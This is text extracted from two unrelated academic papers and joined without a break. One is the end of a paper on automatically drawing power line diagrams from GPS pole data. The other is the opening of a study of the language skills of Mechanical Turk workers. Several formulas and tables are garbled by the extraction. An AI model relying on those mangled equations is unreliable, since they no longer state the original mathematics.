in the plane rectangular coordinate system because it is impossible to draw the figure directly by GPS. In order to draw the figure accurately in the plane coordinate, first we must convert the longitude and latitude data into the plane coordinate data, and calculate the angle and the distance between the two points through the longitude and latitude data[5]. With poles A and B, the following calculation methods can be obtained through the derivation of mathematical geometric formula to realize data conversion. (1) The calculation method of the angle formed by two points A and B is as follows:  180 arctan( ) JA JB WA WB         Among them, θ is the angle (degree) between A and B, JA is the longitude of point a, JB is the longitude of point B, WA is the latitude of point A, WB is the latitude of point B. (2) The calculation method of the distance between two points A and B is as follows:  2 2 2 *acrsin sin ( ) 2 ( ) ( ) * cos( ) *sin ( ) 2 L R WA WB JA JB COS WA WB       Among them, L is the distance between points A and B (m), R is the earth radius (6371km), JA is the longitude of point A, JB is the longitude of point B, WA is the latitude of point A, WB is the latitude of point B. According to the calculation results of formulas (1) and (2), the storage in the database is shown in Figure 2. During traversal, the coordinates are located from the starting point, and then each child node of the node is found by traversal algorithm. The relative coordinates of the nodes are calculated by the span, rotation angle and steering parameters between the child node and the parent node. Due to the need to modify the relevant information of the pole during the traverse process, in order to ensure the integrity and reliability of the original database and improve the speed of database traversal, the information of relevant substation should be saved in the temporary database before the actual traversal[6-7]. The traversal process is as follows. International Journal of Advanced Network, Monitoring and Controls Volume 05, No.02, 2020 74 (1) Using SQL "select into temporary table from original table where change table name" command to create temporary data table and copy the change table data information to be drawn to the temporary table. (2) Find the starting point "transformer" of the transformer in the temporary data table, and set the starting point coordinate of the drawing as  0 0,x y according to the actual position of the transformer in the transformer. Figure 2. Storage in a database (3) Find the distribution board connected with the transformer, calculate the coordinates  0 0,x y of the distribution board according to the distance between the distribution board and the transformer, the steering and the steering angle, mark in the temporary database that the relative position coordinates of the node and the parent node have been calculated, and mark in the parent node that the child node coordinates of the parent node have been calculated. (4) Execute the cycle in the temporary database to select the relative coordinates of this node and the parent node have been calculated, but the poles of the coordinates of the child nodes have not been calculated. (5) Repeat step (3) until all poles are traversed. In the process of traversal, every record in the database must participate in multiple operations. If there are many poles in a substation, the cycle of traversal operation may be too long. Therefore, in the actual traversal operation, it may be faster to use the stored procedure of the database to complete this work. IV. GENERATION OF POWER CIRCUIT DIAGRAM After traversal calculation and plane coordinate positioning, the actual drawing results also need to display other relevant information for users. Therefore, the following work should be completed before automatically generating circuit drawing. (1) Traverse from the starting point (transformer) to calculate the power supply radius of each pole. (2) Draw title block, mark drawing scale, drawing date, type and quantity of various poles, model and length of conductor, number of meter boxes, maximum power supply radius, etc. (3) Statistics of the types, specifications, quantities of various poles in the substation, the length of wires of various specifications and types, the number of various meter boxes (power meter boxes and lighting meter boxes), etc. (4) According to the requirements of the power supply enterprise, the pole will be represented as "○", and the container will be represented as "□". (5) Walk through the database again and draw the line diagram from the starting point. A multi-fork tree structure with transformer as the root node line as the path and pole as the node is established by analyzing the demand of power supply enterprises for the drawing and archiving of power circuit diagrams and combining with the characteristics of power lines. After identifying the information stored in the database, a hierarchical traversal algorithm based on multi-tree is proposed. In the process of drawing, only four parameters of node need to be processed : span, veer, angle and Id number. and then the relative coordinates of each node are calculated and converted into absolute coordinates by using a multi-tree layer traversal algorithm, so that the automatic drawing of power lines can be realized. Then, the relative coordinates of each node are calculated and converted into absolute coordinates by using a multi-tree layer traversal algorithm, so that the automatic drawing of International Journal of Advanced Network, Monitoring and Controls Volume 05, No.02, 2020 75 power lines can be realized. The drawing method discussed in this paper has been successfully applied to many power supply enterprises in our country. Figure 3 shows the circuit diagram of a certain substation automatically generated. Figure 3. Circuit diagram of a transformer station automatically generated V. CONCLUSION The system manages power line parameter data through a database, and realizes the function of automatically drawing power graphs according to the proportion set by users, thus saving human resources. It can quickly change the information in the database when the information about a power line is changed. Therefore, it can well meet the needs of China's power grid reconstruction with short drawing cycle and high working efficiency. This system has achieved good results in the practical application of power supply enterprises in many places. REFERENCES [1] Peng Liangyong, Li Xiaodan. Realization of fast coordinate transformation method for CAD graphics [J]. Surveying and mapping and spatial geographic information, 2020,43(04):199-201. [2] Li Huiping, He Lianfang. Discussion on the Teaching of Auxiliary Modules of AutoCAD Software [J]. Journal of Higher Education, 2020(14):90-92+96. [3] Peng Qiwei, Zhang Hao. Adaptive Relay Algorithm for Medium Voltage Distribution Line Carrier Based on Multitree Traversal [J]. Power System Communication, 2009,30(03):81-84. [4] Wang Fangxiu, Liu Chunhong. A New Algorithm for Constructing Binary Tree by Hierarchical Traversal and Other Traversal [J]. Journal of Wuhan University of Light Industry, 2016,35(04):67-72. [5] Zhao Xiang, Chen Yan. A Coordinate Transformation Algorithm in Geographic Information System [J]. Computer and Network, 2007(11):40-41. [6] Data Structure and Algorithm [M]. Beijing University of Aeronautics and Astronautics Press, Yu Xiaomin, 2010. [7] Kou Chunpeng. Design and Implementation of SQLServer Database Information Acquisition System [D]. beijing university of chemical technology, 2008. work_rujstqwje5gkdm2bqer4drugey ---- The Language Demographics of Amazon Mechanical Turk The Language Demographics of Amazon Mechanical Turk Ellie Pavlick1 Matt Post2 Ann Irvine2 Dmitry Kachaev2 Chris Callison-Burch1,2 1Computer and Information Science Department, University of Pennsylvania 2Human Language Technology Center of Excellence, Johns Hopkins University Abstract We present a large scale study of the languages spoken by bilingual workers on Mechanical Turk (MTurk). We establish a methodology for determining the language skills of anony- mous crowd workers that is more robust than simple surveying. We validate workers’ self- reported language skill claims by measuring their ability to correctly translate words, and by geolocating workers to see if they reside in countries where the languages are likely to be spoken. Rather than posting a one-off survey, we posted paid tasks consisting of 1,000 as- signments to translate a total of 10,000 words in each of 100 languages. Our study ran for several months, and was highly visible on the MTurk crowdsourcing platform, increas- ing the chances that bilingual workers would complete it. Our study was useful both to cre- ate bilingual dictionaries and to act as cen- sus of the bilingual speakers on MTurk. We use this data to recommend languages with the largest speaker populations as good candidates for other researchers who want to develop crowdsourced, multilingual technologies. To further demonstrate the value of creating data via crowdsourcing, we hire workers to create bilingual parallel corpora in six Indian lan- guages, and use them to train statistical ma- chine translation systems. 1 Overview Crowdsourcing is a promising new mechanism for collecting data for natural language processing re- search. Access to a fast, cheap, and flexible work- force allows us to collect new types of data, poten- tially enabling new language technologies. Because crowdsourcing platforms like Amazon Mechanical Turk (MTurk) give researchers access to a world- wide workforce, one obvious application of crowd- sourcing is the creation of multilingual technologies. With an increasing number of active crowd workers located outside of the United States, there is even the potential to reach fluent speakers of lower resource languages. In this paper, we investigate the feasi- bility of hiring language informants on MTurk by conducting the first large-scale demographic study of the languages spoken by workers on the platform. There are several complicating factors when try- ing to take a census of workers on MTurk. The workers’ identities are anonymized, and Amazon provides no information about their countries of ori- gin or their language abilities. Posting a simple sur- vey to have workers report this information may be inadequate, since (a) many workers may never see the survey, (b) many opt not to do one-off surveys since potential payment is low, and (c) validating the answers of respondents is not straightforward. Our study establishes a methodology for deter- mining the language demographics of anonymous crowd workers that is more robust than simple sur- veying. We ask workers what languages they speak and what country they live in, and validate their claims by measuring their ability to correctly trans- late words and by recording their geolocation. To increase the visibility and the desirability of our tasks, we post 1,000 assignments in each of 100 lan- guages. These tasks each consist of translating 10 foreign words into English. Two of the 10 words have known translations, allowing us to validate that the workers’ translations are accurate. We construct bilingual dictionaries with up to 10,000 entries, with the majority of entries being new. Surveying thousands of workers allows us to ana- lyze current speaker populations for 100 languages. 79 Transactions of the Association for Computational Linguistics, 2 (2014) 79–92. Action Editor: Mirella Lapata. Submitted 12/2013; Published 2/2014. c©2014 Association for Computational Linguistics. 11/26/13 turkermap.html file:///Users/ellie/Documents/Research/turker-demographics/code/src/20130905/paper-rewrite/turkermap.html 1/1 111 1,9981,9981,998 Figure 1: The number of workers per country. This map was generated based on geolocating the IP address of 4,983 workers in our study. Omitted are 60 workers who were located in more than one country during the study, and 238 workers who could not be geolocated. The size of the circles represents the number of workers from each country. The two largest are India (1,998 workers) and the United States (866). To calibrate the sizes: the Philippines has 142 workers, Egypt has 25, Russia has 10, and Sri Lanka has 4. The data also allows us to answer questions like: How quickly is work completed in a given language? Are crowdsourced translations reliably good? How often do workers misrepresent their language abili- ties to obtain financial rewards? 2 Background and Related Work Amazon’s Mechanical Turk (MTurk) is an on- line marketplace for work that gives employers and researchers access to a large, low-cost work- force. MTurk allows employers to provide micro- payments in return for workers completing micro- tasks. The basic units of work on MTurk are called ‘Human Intelligence Tasks’ (HITs). MTurk was de- signed to accommodate tasks that are difficult for computers, but simple for people. This facilitates research into human computation, where people can be treated as a function call (von Ahn, 2005; Little et al., 2009; Quinn and Bederson, 2011). It has appli- cation to research areas like human-computer inter- action (Bigham et al., 2010; Bernstein et al., 2010), computer vision (Sorokin and Forsyth, 2008; Deng et al., 2010; Rashtchian et al., 2010), speech pro- cessing (Marge et al., 2010; Lane et al., 2010; Parent and Eskenazi, 2011; Eskenazi et al., 2013), and natu- ral language processing (Snow et al., 2008; Callison- Burch and Dredze, 2010; Laws et al., 2011). On MTurk, researchers who need work completed are called ‘Requesters’, and workers are often re- ferred to as ‘Turkers’. MTurk is a true market, mean- ing that Turkers are free to choose to complete the HITs which interest them, and Requesters can price their tasks competitively to try to attract workers and have their tasks done quickly (Faridani et al., 2011; Singer and Mittal, 2011). Turkers remain anony- mous to Requesters, and all payment occurs through Amazon. Requesters are able to accept submitted work or reject work that does not meet their stan- dards. Turkers are only paid if a Requester accepts their work. Several reports examine Mechanical Turk as an economic market (Ipeirotis, 2010a; Lehdonvirta and Ernkvist, 2011). When Amazon introduced MTurk, it first offered payment only in Amazon credits, and later offered direct payment in US dollars. More re- cently, it has expanded to include one foreign cur- rency, the Indian rupee. Despite its payments be- ing limited to two currencies or Amazon credits, MTurk claims over half a million workers from 190 countries (Amazon, 2013). This suggests that its worker population should represent a diverse set of languages. 80 A demographic study by Ipeirotis (2010b) fo- cused on age, gender, martial status, income lev- els, motivation for working on MTurk, and whether workers used it as a primary or supplemental form of income. The study contrasted Indian and US workers. Ross et al. (2010) completed a longitudi- nal follow-on study. A number of other studies have informally investigated Turkers’ language abilities. Munro and Tily (2011) compiled survey responses of 2,000 Turkers, revealing that four of the six most represented languages come from India (the top six being Hindi, Malayalam, Tamil, Spanish, French, and Telugu). Irvine and Klementiev (2010) had Turkers evaluate the accuracy of translations that had been automatically inducted from monolingual texts. They examined translations of 100 words in 42 low-resource languages, and reported geolocated countries for their workers (India, the US, Romania, Pakistan, Macedonia, Latvia, Bangladesh and the Philippines). Irvine and Klementiev discussed the difficulty of quality control and assessing the plausi- bility of workers’ language skills for rare languages, which we address in this paper. Several researchers have investigated using MTurk to build bilingual parallel corpora for ma- chine translation, a task which stands to benefit low cost, high volume translation on demand (Ger- mann, 2001). Ambati et al. (2010) conducted a pilot study by posting 25 sentences to MTurk for Span- ish, Chinese, Hindi, Telugu, Urdu, and Haitian Cre- ole. In a study of 2000 Urdu sentences, Zaidan and Callison-Burch (2011) presented methods for achieving professional-level translation quality from Turkers by soliciting multiple English translations of each foreign sentence. Zbib et al. (2012) used crowdsourcing to construct a 1.5 million word par- allel corpus of dialect Arabic and English, train- ing a statistical machine translation system that pro- duced higher quality translations of dialect Arabic than a system a trained on 100 times more Mod- ern Standard Arabic-English parallel data. Zbib et al. (2013) conducted a systematic study that showed that training an MT system on crowdsourced trans- lations resulted in the same performance as training on professional translations, at 1 5 the cost. Hu et al. (2010; Hu et al. (2011) performed crowdsourced translation by having monolingual speakers collab- orate and iteratively improve MT output. English 689 Tamil 253 Malayalam 219 Hindi 149 Spanish 131 Telugu 87 Chinese 86 Romanian 85 Portuguese 82 Arabic 74 Kannada 72 German 66 French 63 Polish 61 Urdu 56 Tagalog 54 Marathi 48 Russian 44 Italian 43 Bengali 41 Gujarati 39 Hebrew 38 Dutch 37 Turkish 35 Vietnamese 34 Macedonian 31 Cebuano 29 Swedish 26 Bulgarian 25 Swahili 23 Hungarian 23 Catalan 22 Thai 22 Lithuanian 21 Punjabi 21 Others ≤ 20 Table 1: Self-reported native language of 3,216 bilingual Turkers. Not shown are 49 languages with ≤20 speakers. We omit 1,801 Turkers who did not report their native language, 243 who reported 2 na- tive languages, and 83 with ≥3 native languages. Several researchers have examined cost optimiza- tion using active learning techniques to select the most useful sentences or fragments to translate (Am- bati and Vogel, 2010; Bloodgood and Callison- Burch, 2010; Ambati, 2012). To contrast our research with previous work, the main contributions of this paper are: (1) a robust methodology for assessing the bilingual skills of anonymous workers, (2) the largest-scale census to date of language skills of workers on MTurk, and (3) a detailed analysis of the data gathered in our study. 3 Experimental Design The central task in this study was to investigate Me- chanical Turk’s bilingual population. We accom- plished this through self-reported surveys combined with a HIT to translate individual words for 100 languages. We evaluate the accuracy of the work- ers’ translations against known translations. In cases where these were not exact matches, we used a sec- ond pass monolingual HIT, which asked English speakers to evaluate if a worker-provided translation was a synonym of the known translation. Demographic questionnaire At the start of each HIT, Turkers were asked to complete a brief survey about their language abilities. The survey asked the following questions: • Is [language] your native language? • How many years have you spoken [language]? 81 • Is English your native language? • How many years have you spoken English? • What country do you live in? We automatically collected each worker’s current lo- cation by geolocating their IP address. A total of 5,281 unique workers completed our HITs. Of these, 3,625 provided answers to our survey questions, and we were able to geolocate 5,043. Figure 1 plots the location of workers across 106 countries. Table 1 gives the most common self-reported native lan- guages. Selection of languages We drew our data from the different language versions of Wikipedia. We se- lected the 100 languages with the largest number of articles 1 (Table 2). For each language, we chose the 1,000 most viewed articles over a 1 year period,2 and extracted the 10,000 most frequent words from them. The resulting vocabularies served as the input to our translation HIT. Translation HIT For the translation task, we asked Turkers to translate individual words. We showed each word in the context of three sentences that were drawn from Wikipedia. Turkers were al- lowed to mark that they were unable to translate a word. Each task contained 10 words, 8 of which were words with unknown translations, and 2 of which were quality control words with known trans- lations. We gave special instruction for translat- ing names of people and places, giving examples of how to handle ‘Barack Obama’ and ‘Australia’ using their interlanguage links. For languages with non-Latin alphabets, names were transliterated. The task paid $0.15 for the translation of 10 words. Each set of 10 words was independently translated by three separate workers. 5,281 workers completed 256,604 translation assignments, totaling more than 3 million words, over a period of three and a half months. Gold standard translations A set of gold stan- dard translations were automatically harvested from 1http://meta.wikimedia.org/wiki/List_of_ Wikipedias 2http://dumps.wikimedia.org/other/ pagecounts-raw/ 500K+ ARTICLES: German (de), English (en), Spanish (es), French (fr), Italian (it), Japanese (ja), Dutch (nl), Polish (pl), Portuguese (pt), Russian (ru) 100K-500K ARTICLES: Arabic (ar), Bulgarian (bg), Catalan (ca), Czech (cs), Danish (da), Esperanto (eo), Basque (eu), Persian (fa), Finnish (fi), Hebrew (he), Hindi (hi), Croatian (hr), Hungarian (hu), Indonesian (id), Korean (ko), Lithuanian (lt), Malay (ms), Norwe- gian (Bokmal) (no), Romanian (ro), Slovak (sk), Slovenian (sl), Ser- bian (sr), Swedish (sv), Turkish (tr), UKrainian (UK), Vietnamese (vi), Waray-Waray (war), Chinese (zh) 10K-100K ARTICLES: Afrikaans (af) Amharic (am) Asturian (ast) Azerbaijani (az) Belarusian (be) Bengali (bn) Bishnupriya Manipuri (bpy) Breton (br) Bosnian (bs) Cebuano (ceb) Welsh (cy) Zazaki (diq) Greek (el) West Frisian (fy) Irish (ga) Galician (gl) Gujarati (gu) Haitian (ht) Armenian (hy) Icelandic (is) Javanese (jv) Geor- gian (ka) Kannada (kn) Kurdish (ku) Luxembourgish (lb) Latvian (lv) Malagasy (mg) Macedonian (mk) Malayalam (ml) Marathi (mr) Neapolitan (nap) Low Saxon (nds) Nepali (ne) Newar / Nepal Bhasa (new) Norwegian (Nynorsk) (nn) Piedmontese (pms) Sicil- ian (scn) Serbo-Croatian (sh) Albanian (sq) Sundanese (su) Swahili (sw) Tamil (ta) Telugu (te) Thai (th) Tagalog (tl) Urdu (ur) Yoruba (yo) <10K ARTICLES: Central Bicolano (bcl) Tibetan (bo) Ilokano (ilo) Punjabi (pa) Kapampangan (pam) Pashto (ps) Sindhi (sd) Somali (so) Uzbek (uz) Wolof (wo) Table 2: A list of the languages that were used in our study, grouped by the number of Wikipedia articles in the language. Each language’s code is given in parentheses. These language codes are used in other figures throughout this paper. Wikipedia for every language to use as embedded controls. We used Wikipedia’s inter-language links to pair titles of English articles with their corre- sponding foreign article’s title. To get a more trans- latable set of pairs, we excluded any pairs where: (1) the English word was not present in the WordNet ontology (Miller, 1995), (2) either article title was longer than a single word, (3) the English Wikipedia page was a subcategory of person or place, or (4) the English and the foreign titles were identical or a substring of the other. Manual evaluation of non-identical translations We counted all translations that exactly matched the gold standard translation as correct. For non- exact matches we created a second-pass quality as- surance HIT. Turkers were shown a pair of En- glish words, one of which was a Turker’s transla- tion of the foreign word used for quality control, and the other of which was the gold-standard trans- lation of the foreign word. Evaluators were asked whether the two words had the same meaning, and chose between three answers: ‘Yes’, ‘No’, or ‘Re- 82 Figure 2: Days to complete the translation HITs for 40 of the languages. Tick marks represent the com- pletion of individual assignments. lated but not synonymous.’ Examples of mean- ing equivalent pairs include: <petroglyphs, rock paintings>, <demo, show> and <loam, loam: soil rich in decaying matter>. Non-meaning equiva- lents included: <assorted, minutes>, and <major, URL of image>. Related items were things like <sky, clouds>. Misspellings like <lactation, lac- tiation > were judged to have same meaning, and were marked as misspelled. Three separate Turkers judged each pair, allowing majority votes for diffi- cult cases. We checked Turkers who were working on this task by embedding pairs of words which were ei- पा क$ %तान ( भी + त$ कार %व.प २८ मई १९९८ 5 छह परमाण9 परी:ण कर डा<। In retribution pakistan also did six nuclear tests on 28 may 1998. On 28 May Pakistan also conducted six nuclear tests as an act of redressal. Retaliating on this ’Pakistan’ conducted Six(6) Nuclear Tests on 28 May, 1998. pakistan also did 6 nuclear test in retribution on 28 may, 1998 Figure 3: An example of the Turkers’ translations of a Hindi sentence. The translations are unedited and contain fixable spelling, capitalization and grammat- ical errors. ther known to be synonyms (drawn from Word- Net) or unrelated (randomly chosen from a corpus). Automating approval/rejections for the second-pass evaluation allowed the whole pipeline to be run au- tomatically. Caching judgments meant that we ulti- mately needed only 20,952 synonym tasks to judge all of the submitted translations (a total of 74,572 non-matching word pairs). These were completed by an additional 1,005 workers. Each of these as- signments included 10 word pairs and paid $0.10. Full sentence translations To demonstrate the feasibility of using crowdsourcing to create multi- lingual technologies, we hire Turkers to construct bilingual parallel corpora from scratch for six In- dian languages. Germann (2001) attempted to build a Tamil-English translation system from scratch by hiring professional translators, but found the cost prohibitive. We created parallel corpora by trans- lating the 100 most viewed Wikipedia pages in Ben- gali, Malyalam, Hindi, Tamil, Telugu, and Urdu into English. We collected four translations from differ- ent Turkers for each source sentence. Workers were paid $0.70 per HIT to translate 10 sentences. We accepted or rejected translations based on a manual review of each worker’s submis- sions, which included a comparison of the transla- tions to a monotonic gloss (produced with a dic- tionary), and metadata such as the amount of time the worker took to complete the HIT and their geo- graphic location. Figure 3 shows an example of the translations we obtained. The lack of a professionally translated reference sentences prevented us from doing a sys- tematic comparison between the quality of profes- 83 p t b s sh t l it sr ro e s m s d e a f te h r id d a n l tr g u sk fi h e m l fr ja p a b g m k n o g l h t g a sv c y lv h u k n a z b e lt k o n e e o a r p l m r c a c s sw t a h i b n n n k a so z h jv e l c e b v i b c l is su u z lb b p y sc n n e w u r sd b r p s ru a m w o b o0.0 0.2 0.4 0.6 0.8 1.0 Figure 4: Translation quality for languages with at least 50 Turkers. The dark blue bars indicate the pro- portion of translations which exactly matched gold standard translations, and light blue indicate translations which were judged to be correct synonyms. Error bars show the 95% confidence intervals for each language. sion and non-professional translations as Zaidan and Callison-Burch (2011) did. Instead we evaluate the quality of the data by using it to train SMT systems. We present results in section 5. 4 Measuring Translation Quality For single word translations, we calculate the qual- ity of translations on the level of individual assign- ments and aggregated over workers and languages. We define an assignment’s quality as the proportion of controls that are correct in a given assignment, where correct means exactly correct or judged to be synonymous. Quality(ai) = 1 ki ki∑ j=1 δ(trij ∈ syns[gj]) (1) where ai is the ith assignment, ki is the number of controls in ai, trij is the Turker’s provided transla- tion of control word j in assignment i, gj is the gold standard translation of control word j, syns[gj] is the set of words judged to be synonymous with gj and includes gj, and δ(x) is Kronecker’s delta and takes value 1 when x is true. Most assignments had two known words embedded, so most assignments had scores of either 0, 0.5, or 1. Since computing overall quality for a language as the average assignment quality score is biased to- wards a small number of highly active Turkers, we instead report language quality scores as the aver- age per-Turker quality, where a Turker’s quality is the average quality of all the assignments that she completed: Quality(ti) = ∑ aj∈assigns[i] Quality(aj) | assigns[i] | (2) where assigns[i] is the assignments completed by Turker i, and Quality(a) is as above. Quality for a language is then given by Quality(li) = ∑ tj∈turkers[i] Quality(tj) | turkers[i] | (3) When a Turker completed assignments in more than one language, their quality was computed separately for each language. Figure 4 shows the transla- tion quality for languages with contributions from at least 50 workers. Cheating using machine translation One obvi- ous way for workers to cheat is to use available online translation tools. Although we followed best practices to deter copying-and-pasting into on- line MT systems by rendering words and sentences 84 as images (Zaidan and Callison-Burch, 2011), this strategy does not prevent workers from typing the words into an MT system if they are able to type in the language’s script. To identify and remove workers who appeared to be cheating by using Google Translate, we calcu- lated each worker’s overlap with the Google transla- tions. We used Google to translate all 10,000 words for the 51 foreign languages that Google Trans- late covered at the time of the study. We mea- sured the percent of workers’ translations that ex- actly matched the translation returned from Google. Figure 5a shows overlap between Turkers’s trans- lations and Google Translate. When overlap is high, it seems likely that those Turkers are cheating. It is also reasonable to assume that honest workers will overlap with Google some amount of the time as Google’s translations are usually accurate. We di- vide the workers into three groups: those with very high overlap with Google (likely cheating by using Google to translate words), those with reasonable overlap, and those with no overlap (likely cheating by other means, for instance, by submitting random text). Our gold-standard controls are designed to iden- tify workers that fall into the third group (those who are spamming or providing useless translations), but they will not effectively flag workers who are cheat- ing with Google Translate. We therefore remove the 500 Turkers with the highest overlap with Google. This equates to removing all workers with greater than 70% overlap. Figure 5b shows that removing workers at or above the 70% threshold retains 90% of the collected translations and over 90% of the workers. Quality scores reported throughout the paper re- flect only translations from Turkers whose overlap with Google falls below this 70% threshold. 5 Data Analysis We performed an analysis of our data to address the following questions: • Do workers accurately represent their language abilities? Should we constrain tasks by region? • How quickly can we expect work to be com- pleted in a particular language? (a) Individual workers’ overlap with Google Translate. We removed the 500 workers with the highest overlap (shaded region on the left) from our analyses, as it is rea- sonable to assume these workers are cheating by submit- ting translations from Google. Workers with no overlap (shaded region on the right) are also likely to be cheating, e.g. by submitting random text. (b) Cumulative distribution of overlap with Google trans- late for workers and translations. We see that eliminating all workers with >70% overlap with google translate still preserves 90% of translations and >90% of workers. Figure 5 • Can Turkers’ translations be used to train MT systems? • Do our dictionaries improve MT quality? Language skills and location We measured the average quality of workers who were in countries that plausibly speak a language, versus workers from countries that did not have large speaker populations of that language. We used the Ethnologue (Lewis 85 Avg. Turker quality (# Ts) Primary locations Primary locations In region Out of region of Turkers in region of Turkers out of region Hindi 0.63 (296) 0.69 (7) India (284) UAE (5) UK (3) Saudi Arabia (2) Russia (1) Oman (1) Tamil 0.65 (273) ** 0.25 (2) India (266) US (3) Canada (2) Tunisia (1) Egypt (1) Malayalam 0.76 (234) 0.83 (2) India (223) UAE (6) US (3) Saudi Arabia (1) Maldives (1) Spanish 0.81 (191) 0.84 (18) US (122) Mexico (16) Spain (14) India (15) New Zealand (1) Brazil (1) French 0.75 (170) 0.82 (11) India (62) US (45) France (23) Greece (2) Netherlands (1) Japan (1) Chinese 0.60 (116) 0.55 (21) US (75) Singapore (13) China (9) Hong Kong (6) Australia (3) Germany (2) German 0.82 (91) 0.77 (41) Germany (48) US (25) Austria (7) India (34) Netherlands (1) Greece (1) Italian 0.86 (90) * 0.80 (42) Italy (42) US (29) Romania (7) India (33) Ireland (2) Spain (2) Amharic 0.14 (16) ** 0.01 (99) US (14) Ethiopia (2) India (70) Georgia (9) Macedonia (5) Kannada 0.70 (105) NA (0) India (105) Arabic 0.74 (60) ** 0.60 (45) Egypt (19) Jordan (16) Morocco (9) US (19) India (11) Canada (3) Sindhi 0.19 (96) 0.06 (9) India (58) Pakistan (37) US (1) Macedonia (4) Georgia (2) Indonesia (2) Portuguese 0.87 (101) 0.96 (3) Brazil (44) Portugal (31) US (15) Romania (1) Japan (1) Israel (1) Turkish 0.76 (76) 0.80 (27) Turkey (38) US (18) Macedonia (8) India (19) Pakistan (4) Taiwan (1) Telugu 0.80 (102) 0.50 (1) India (98) US (3) UAE (1) Saudi Arabia (1) Irish 0.74 (54) 0.71 (47) US (39) Ireland (13) UK (2) India (36) Romania (5) Macedonia (2) Swedish 0.73 (54) 0.71 (45) US (25) Sweden (22) Finland (3) India (23) Macedonia (6) Croatia (2) Czech 0.71 (45) * 0.61 (50) US (17) Czech Republic (14) Serbia (5) Macedonia (22) India (10) UK (5) Russian 0.15 (67) * 0.12 (27) US (36) Moldova (7) Russia (6) India (14) Macedonia (4) UK (3) Breton 0.17 (3) 0.18 (89) US (3) India (83) Macedonia (2) China (1) Table 3: Translation quality when partitioning the translations into two groups, one containing translations submitted by Turkers whose location is within regions that plausibly speak the foreign language, and the other containing translations from Turkers outside those regions. In general, in-region Turkers provide higher quality translations. (**) indicates differences significant at p=0.05, (*) at p=0.10. et al., 2013) to compile the list of countries where each language is spoken. Table 3 compares the av- erage translation quality of assignments completed within the region of each language, and compares it to the quality of assignments completed outside that region. Our workers reported speaking 95 languages na- tively. US workers alone reported 61 native lan- guages. Overall, 4,297 workers were located in a region likely to speak the language from which they were translating, and 2,778 workers were located in countries considered out of region (meaning that about a third of our 5,281 Turkers completed HITs in multiple languages). Table 3 shows the differences in translation qual- ity when computed using in-region versus out-of- region Turkers, for the languages with the greatest number of workers. Within region workers typi- cally produced higher quality translations. Given the number of Indian workers on Mechanical Turk, it is unsurprising that they represent majority of out- of-region workers. For the languages that had more than 75 out of region workers (Malay, Amharic, Ice- landic, Sicilian, Wolof, and Breton), Indian workers represented at least 70% of the out of region workers in each language. A few languages stand out for having suspiciously strong performance by out of region workers, no- tably Irish and Swedish, for which out of region workers account for a near equivalent volume and quality of translations to the in region workers. This is admittedly implausible, considering the relatively small number of Irish speakers worldwide, and the very low number living in the countries in which our Turkers were based (primarily India). Such results highlight the fact that cheating using online transla- tion resources is a real problem, and despite our best efforts to remove workers using Google Translate, some cheating is still evident. Restricting to within region workers is an effective way to reduce the prevalence of cheating. We discuss the languages which are best supported by true native speakers in section 6. Speed of translation Figure 2 gives the comple- tion times for 40 languages. The 10 languages to finish in the shortest amount of time were: Tamil, Malayalam, Telugu, Hindi, Macedonian, Spanish, Serbian, Romanian, Gujarati, and Marathi. Seven of the ten fastest languages are from India, which is un- 86 320 2 4 6 8 10 12 14 16 18 20 22 24 26 28 30 800,000 0 100,000 200,000 300,000 400,000 500,000 600,000 700,000 M al ay al am Ta m il Tel ugu Hindi Urd u Ben gal i Figure 6: The total volume of translations (measured in English words) as a function of elapsed days. sentence English + dictionary language pairs foreign words entries Bengali 22k 732k 22k Hindi 40k 1,488k 22k Malayalam 32k 863k 23k Tamil 38k 916k 25k Telugu 46k 1,097k 21k Urdu 35k 1,356k 20k Table 4: Size of parallel corpora and bilingual dic- tionaries collected for each language. surprising given the geographic distribution of work- ers. Some languages follow the pattern of having a smattering of assignments completed early, with the rate picking up later. Figure 6 gives the throughput of the full-sentence translation task for the six Indian languages. The fastest language was Malayalam, for which we col- lected half a million words of translations in just un- der a week. Table 4 gives the size of the data set that we created for each of these languages. Training SMT systems We trained statistical translation models from the parallel corpora that we created for the six Indian languages using the Joshua machine translation system (Post et al., 2012). Table 5 shows the translation performance when trained on the bitexts alone, and when incorporating the bilingual dictionaries created in our earlier HIT. The scores reflect the performance when tested on held out sentences from the training data. Adding the dic- trained on bitext + BLEU language bitexts alone dictionaries ∆ Bengali 12.03 17.29 5.26 Hindi 16.19 18.10 1.91 Malayalam 6.65 9.72 3.07 Tamil 8.08 9.66 1.58 Telugu 11.94 13.70 1.76 Urdu 19.22 21.98 2.76 Table 5: BLEU scores for translating into English using bilingual parallel corpora by themselves, and with the addition of single-word dictionaries. Scores are calculated using four reference translations and represent the mean of three MERT runs. tionaries to the training set produces consistent per- formance gains, ranging from 1 to 5 BLEU points. This represents a substantial improvement. It is worth noting, however, that while the source doc- uments for the full sentences used for testing were kept disjoint from those used for training, there is overlap between the source materials for the dictio- naries and those from the test set, since both the dic- tionaries and the bitext source sentences were drawn from Wikipedia. 6 Discussion Crowdsourcing platforms like Mechanical Turk give researchers instant access to a diverse set of bilin- gual workers. This opens up exciting new avenues for researchers to develop new multilingual systems. The demographics reported in this study are likely to shift over time. Amazon may expand its payments to new currencies. Posting long-running HITs in other languages may recruit more speakers of those lan- guages. New crowdsourcing platforms may emerge. The data presented here provides a valuable snap- shot of the current state of MTurk, and the methods used can be applied generally in future research. Based on our study, we can confidently recom- mend 13 languages as good candidates for research now: Dutch, French, German, Gujarati, Italian, Kan- nada, Malayalam, Portuguese, Romanian, Serbian, Spanish, Tagalog, and Telugu. These languages have large Turker populations who complete tasks quickly and accurately. Table 6 summarizes the strengths and weaknesses of all 100 languages cov- ered in our study. Several other languages are viable 87 workers quality speed many high fast Dutch, French, German, Gu- jarati, Italian, Kannada, Malay- alam, Portuguese, Romanian, Serbian, Spanish, Tagalog, Tel- ugu slow Arabic, Hebrew, Irish, Punjabi, Swedish, Turkish low fast Hindi, Marathi, Tamil, Urdu or medium slow Bengali, Bishnupriya Ma- nipuri, Cebuano, Chinese, Nepali, Newar, Polish, Russian, Sindhi, Tibetan few high fast Bosnia, Croatian, Macedonian, Malay, Serbo-Croatian slow Afrikaans, Albanian, Aragonese, Asturian, Basque, Belarusian, Bulgarian, Central Bicolano, Czech, Danish, Finnish, Galacian, Greek, Haitian, Hungarian, Icelandic, Ilokano, Indonesian, Japanese, Javanese, Kapampangan, Kazakh, Korean, Lithuanian, Low Saxon, Malagasy, Nor- wegian (Bokmal), Sicilian, Slovak, Slovenian, Thai, UKra- nian, Uzbek, Waray-Waray, West Frisian, Yoruba low fast – or medium slow 